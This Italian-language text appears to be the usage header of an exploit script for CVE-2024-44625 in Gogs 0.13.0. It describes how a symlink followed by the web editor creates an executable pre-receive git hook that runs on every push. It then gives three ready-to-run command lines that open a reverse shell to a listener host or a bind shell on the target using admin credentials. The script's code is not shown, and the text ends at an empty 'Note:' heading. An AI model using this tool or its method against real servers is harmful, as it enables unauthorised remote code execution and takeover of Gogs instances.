
Exploit per CVE-2024-44625 in Gogs 0.13.0, che consente l'esecuzione remota di codice tramite symlink-follow per creare una git hook, con modalità reverse e bind shell.
Validato contro una versione Gogs dell'era 0.13.0 dietro un reverse proxy. Primitiva: symlink-follow dell'editor web verso un file ASSENTE .git/hooks/pre-receive che crea quel file (eseguibile). Ogni push successivo al repository lo esegue.
Utilizzo:
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
--mode reverse --lhost <YOUR_IP> --lport 4444
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
--mode bind --bind-port 5555
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
--mode reverse --lhost IP --lport 4444 --repo <name> --reuse --triggers 3
Note: